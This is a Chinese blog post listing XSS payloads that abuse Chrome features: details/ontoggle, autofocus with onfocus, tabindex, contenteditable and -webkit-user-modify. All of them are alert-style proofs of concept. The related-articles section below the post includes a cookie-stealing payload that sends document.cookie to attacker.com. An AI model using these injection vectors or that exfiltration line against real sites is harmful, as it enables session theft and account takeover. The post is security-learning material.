关于谷歌浏览器特性的一些xss payload

已于 2025-01-09 17:18:35 修改
阅读量2.1k 收藏 3
点赞数
CC 4.0 BY-SA版权
分类专栏: 随笔 文章标签: xss
于 2021-01-24 15:14:23 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/chest_/article/details/113090984
这篇博客探讨了HTML的autofocus属性、tabindex和contenteditable如何结合使用来实现页面焦点控制和交互效果。通过示例展示了如何在Chrome浏览器中利用这些特性创建弹窗、自定义标签的tab切换以及可编辑内容的焦点事件。同时,还提到了`-webkit-user-modify`样式属性,用于控制元素的可编辑性。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

声明

文章仅用于交流学习,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任,往下阅读此文章则默认遵守此规则!

details 标签

details标签用于描述文档或文档某个部分的细节,目前只有 Chrome 支持 details标签

">'><details/open/οntοggle=confirm(1)>

autofocus属性

说明

autofocus 属性规定当页面加载时标签内元素应该自动获得焦点

onfocus 事件在对象获得焦点时发生

结合起来即可达到弹窗效果

在chrome中autofocus可以与所有HTML标签一起使用,可以利用autofocus属性进行自定义标签

<iframe autofocus onfocus=alert(1)>
<a autofocus onfocus=alert(23) href=#>x</a>

解释:autofocus在页面加载时自动获得焦点,而onfocus 事件在对象获得焦点时发生,所以会产生弹窗。

tabindex

tabIndex 属性可设置或返回单选按钮的 tab 键控制次序,也就是设置了该属性,可以用tab建来回切换标签

<xss tabindex=1 onfocus=alert(1) autofocus>

例如:

<a tabindex=1 onfocus=alert(1) autofocus>1
<a tabindex=2 onfocus=alert(2) autofocus>2
<a tabindex=3 onfocus=alert(3) autofocus>3
<a tabindex=3 onfocus=alert(4) autofocus>4

tab切换标签触发焦点从而弹窗

在这里插入图片描述

contenteditable

contenteditable 属性指定元素内容是否可编辑,当插入contenteditable后,标签页面将变得可以编辑,结合autofocus,聚焦时也可触发弹窗

<a onfocus=alert(1) autofocus contenteditable>111

在这里插入图片描述

user-modify
<x style="-webkit-user-modify:read-write-plaintext-only" onfocus=alert(1) autofocus>
<x style="-webkit-user-modify:read-write" onfocus=alert(1) autofocus>
<x style="-webkit-user-modify:read-write" onfocus=confirm() autofocus>    
confirm()
Web安全攻防渗透测试实战指南笔记 三
Ren59421的博客
04-05 8670
第二章 2.1 在Linux系统中安装LANMP LANMP是Linux下Apache、Nginx、MySQL和PHP的应用环境,本节演示的是WDLinux的一款集成的安装包。 首先,下载需要的安装包,命令如下所示。 wegt http://dl.wdlinux.cn/files/lanmp_v3.tar.gz 下载完成后进行解压,解压文件的命令为tar zxvf lanmp_v3.tar.gz,运行环境如下图所示。 输入sh lanmp.sh命令运行LANMP,这时程...
04 渗透测试基础
weixin_43234021的博客
01-04 1万+
渗透测试基础一 代码审计1 基础环境搭建(1) Web服务:WAMP+phpstudy(2) phpstudy2 HTML 表单 一 代码审计 1 基础环境搭建 (1) Web服务:WAMP+phpstudy (2) phpstudy 启动问题 端口正常开放 80 http 3306 mysql web根目录[C:\Users\dq\Documents\phpStudy-1-24\phpStudy\WWW] php 探针 phpinfo.php phpmyadmin Apache配置文件:[
payload:浏览器的一个更简单,更小的模块加载器
05-01
有效载荷 浏览器的一个更简单,更小的模块加载器。 不用担心您JavaScript文件包含在其中的顺序。 只需声明每个模块需要哪些依赖关系,并且在加载所有依赖关系后,Payload就会初始化该模块。 还有另一个模块加载器? 是的,我知道。 CommonJS,Require,SystemJS和其他100万个都解决了这个问题。 看,我并不是说您需要使用有效负载。 我只是说有时候流行的解决方案感觉就像用大锤在墙上贴图钉一样。 有效载荷小于2kb(对于IE <9,有效载荷为三分之一),它只有两种简单的方法。 安装 bower install payload 或者: npm install payload --save 然后在模块之前将其包含在HTML中: [removed][removed]
如何查看chrome里network的payload
宝安小雨
03-19 2997
如何查看chrome的network的请求payload,点击漏斗形状的过滤器,过滤框清空,表示检测所有,右边按钮点击“全部”,“第三方请求”不要勾选。
谷歌浏览器复制post请求中的request payload,如果想生成json数据
质量不太好的博客
11-14 5116
谷歌浏览器复制post请求中的request payload,如果想生成json数据
Chrome 开发者工具新功能-网络面板新增载荷(Payload)边栏
高行行
12-09 1万+
最近开发发现 Chrome 开发者工具里网络请求参数信息被放到了Payload一栏里,感觉可以,查找信息更方便了些 官方新功能介绍文档: https://developer.chrome.com/zh/blog/new-in-devtools-96/ 网络面板新增载荷(Payload)边栏 当您想查看网络请求中的 payload 信息时,可以使用网络面板里面的 Payload 边栏。此前,payload 信息出现在报头边栏里。 Chromium 议题:1214030 ...
ChromeRce:2021年4月15日出现的Chrome payload
04-16
Chrome Rce Payload 文件在payload.html中
渗透测试学习目录
liupc的学习笔记
05-04 3601
1. 行业术语扫盲 2. 3.
Burp Suite使用介绍总结
h4ck0ne的博客
01-23 5563
Burp Suite使用介绍(一) 小乐天 · 2014/05/01 19:54 Getting Started Burp Suite 是用于攻击web 应用程序的集成平台。它包含了许多工具,并为这些工具设计了许多接口,以促进加快攻击应用程序的过程。所有的工具都共享一个能处理并显示HTTP 消息,持久性,认证,代理,日志,警报的一个强大的可扩展的框架。本文主要介绍它的以下特点: 1.T
史上最全常见前端大厂面试知识点汇总【已过字节, 腾讯teg,华为,网易】
反手一个bug的博客
05-29 5629
文章目录网络,浏览器篇tcp/ip协议有几层网络七层协议内容浏览器进程和线程进程通信的方式https加密过程url到页面过程http2和http1的区别如何实现有状态的http协议强缓存和协商缓存(浏览器缓存机制)强缓存协商缓存浏览器缓存过程跨域请求js原理篇js执行机制单线程执行宿主执行栈Event Loop宏任务和微任务js为什么设计成单线程语言手写newES6中class是语法还是语法糖原型的终点手写实现promise,promise. all,promise. racepromisepromise.
chrome浏览器开发者模式header请求参数“Request Payload“找不到的问题
热门推荐
lixiaomei0623的专栏
11-29 1万+
今天查看接口的时候,发现chrome(谷歌)浏览器开发者工具中,接口请求的参数看不见了,对比一下其他浏览器,还是能看到请求的参数的。查看开发者工具的请求区域,发现了一栏“Payload”,里面有请求的参数。如图所示: ...
XSS Payload浏览器的各种解码问题
m0_63069714的博客
03-07 838
因此,在""和“”的内容中不会创建标签,就不会有脚本能够执行。经过HTML解码后为"",返回的结果是:The javascript will not execute and the character entities will not be decoded either.在 : 前面经过HTML解码后为"javascript",后面经过urlcode解码之后为"alert(2)",返回的结果是:The javascript will execute.
如何查看Safari浏览器network里Request的Payload
weixin_45823629的博客
07-07 4019
右键点击页面选择Inspect Element,打开Network,选择右上角Request(Object Tree)
XSS Payload 学习浏览器解码
m0_61579490的博客
07-26 383
XSS Payload 学习浏览器解码
Chrome浏览器开发者工具中header的请求参数‘Request Payload‘ 和 ‘Query String Parameters‘ 消失不见
qq_45060674的博客
09-11 6321
chrome浏览器开发者工具中的**接口请求参数不见了**(Form Data)。上网搜索了很久,最后发现请求参数其实是在Payload
关于浏览器Ajax请求Type为Request Payload而不是Form Data
chuque4897的博客
01-02 372
排查了许久。最后得出来是JqGrid插件的问题 没办法,底层不能改 在你Ajax请求中加上 headers : { 'Content-Type' : 'application/x-www-form-urlencoded' }, 示例: $.ajax({...
XSS Payload 学习浏览器解析机制
weixin_59280309的博客
07-25 1803
浏览器解析机制遵循规则;XSS Payload举例:
为什么chrome没有paylod
yilu_beiyu的博客
03-02 5344
引用自: Unable to see Request Payload in Chrome Network tab - Super User if your form set enctype="multipart/form-data", then Chrome will not catch the request payload. <form action="" method="POST" enctype="multipart/form-data"> </form> ...
XSS payload
最新发布
03-23
### 跨站脚本攻击(XSS)有效负载示例 跨站脚本攻击(XSS)是一种常见的安全漏洞,允许攻击者通过注入恶意脚本来执行未经授权的操作。以下是几种常见类型的 XSS 攻击及其对应的测试用有效负载。 #### 存储型 XSS 存储型 XSS 是指恶意脚本被永久存储在目标服务器上,当其他用户访问受影响页面时会触发该脚本。以下是一个简单的 HTML 注入例子: ```html <script>alert('Stored XSS Example');</script> ``` 这种有效负载会在用户的浏览器中弹出一个警告框[^4]。 #### 反射型 XSS 反射型 XSS 发生在用户输入的数据未经适当验证或编码即返回给客户端的情况下。下面是一些典型的反射型 XSS 测试用例: ```javascript "><script>document.location='http://attacker.com/'+document.cookie;</script> ``` 此代码片段尝试窃取受害者的 Cookie 并将其发送到攻击者的网站[^5]。 #### DOM 型 XSS DOM 型 XSS 不依赖于服务端响应的变化,而是完全基于前端 JavaScript 的行为改变来实现攻击。例如: ```javascript javascript:alert(document.domain); ``` 这段代码利用 `javascript:` 协议直接运行一段脚本,在某些情况下可以绕过同源策略限制[^6]。 为了防止这些潜在威胁,开发者应遵循最佳实践如输入验证、输出转义以及采用现代框架的安全特性等措施。此外,对于 PHP 应用程序而言,如果启用了 `magic_quotes_gpc` 功能,则可能需要额外处理反斜杠字符以防干扰正常解析逻辑[^3]。 最后值得注意的是,虽然上述内容提供了关于如何构建基本形式下的 XSS Payloads 的指导方针,但在实际环境中实施任何渗透测试活动前都需获得合法授权并严格遵守法律法规的要求。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值